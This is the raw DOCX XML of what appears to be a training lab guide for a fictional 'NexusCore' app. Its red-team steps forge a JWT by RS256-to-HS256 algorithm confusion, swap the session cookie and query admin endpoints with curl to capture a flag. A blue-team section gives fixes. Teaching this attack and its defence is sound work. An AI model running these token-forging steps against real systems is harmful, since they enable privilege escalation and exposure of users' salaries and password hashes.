              <w:bottom w:val="single" w:color="C8D6E5"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Header shows: {"alg":"RS256","typ":"JWT"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Payload shows: {"id":7,"username":"demo","role":"engineer","clearance":1,...}</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Forge a new JWT with HS256 and role=ciso</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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On jwt.io — in HEADER section change: "alg":"RS256" → "alg":"HS256"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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In PAYLOAD section change: "role":"engineer" → "role":"ciso"  and  "clearance":1 → "clearance":5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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In VERIFY SIGNATURE section — paste the public key: nexuscore-public-key-2024</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Copy the new signed token from the Encoded box on the left.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Forged JWT header:
{"alg": "HS256", "typ": "JWT"}
# Forged JWT payload:
{"id":7,"username":"demo","emp_id":"EMP007",
 "role":"ciso","clearance":5,"full_name":"Demo User"}
# Sign with HMAC-SHA256 using PUBLIC KEY as secret:
# Secret: nexuscore-public-key-2024
# (The server will use this same key for HS256 verification!)</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Replace cookie and access CISO-only admin routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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DevTools → Application → Cookies → Double-click ncx_token → Paste forged token → Enter.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Click "Load All Users (CISO)" → Full user database visible with salaries!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Click "Load API Keys" → Capture FLAG: NEXUSCORE{jwt_algo_confusion_rs256_hs256}</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Also test via curl with forged token:
curl -H "Authorization: Bearer FORGED_TOKEN" \
  http://localhost:7007/api/admin/users
# Returns: all 7 users with full details including salary, phone, password hash</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Forge JWT with alg=HS256 signed using public key. Access /api/admin/users as engineer "demo". Capture FLAG: NEXUSCORE{jwt_algo_confusion_rs256_hs256} from /api/admin/keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforce algorithm on the server — never trust token's alg claim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The fix is one line: hardcode the expected algorithm, ignore the token header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Never read alg from the token and use it for verification — this is the root cause.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># VULNERABLE:
alg = header.get("alg", "RS256")   # trusts token's own claim!
sec = JWT_RSA_SECRET if alg=="RS256" else JWT_PUBLIC_KEY  # WRONG!
# FIXED — always use server-side config:
EXPECTED_ALG = "RS256"  # hardcoded server config
ALWAYS_USE_SECRET = JWT_RSA_SECRET  # always the same key
def verify_jwt_fixed(token):
    p = token.split(".")
    hdr = json.loads(base64.urlsafe_b64decode(pad(p[0])))
    if hdr.get("alg") != EXPECTED_ALG:   # reject if alg doesn't match
        return None
    # Always verify with the same key regardless:
    expected = hmac_sign(ALWAYS_USE_SECRET, f"{p[0]}.{p[1]}")
    return json.loads(...) if p[2] == expected else None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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Do not expose the public key via API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Remove /api/auth/public-key endpoint — there is no reason to serve it to users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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If clients need it for their own verification, distribute it out-of-band (e.g. in app config).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Exposing the public key makes algorithm confusion trivial — without it, attacker must guess.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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Use a well-tested JWT library instead of manual implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
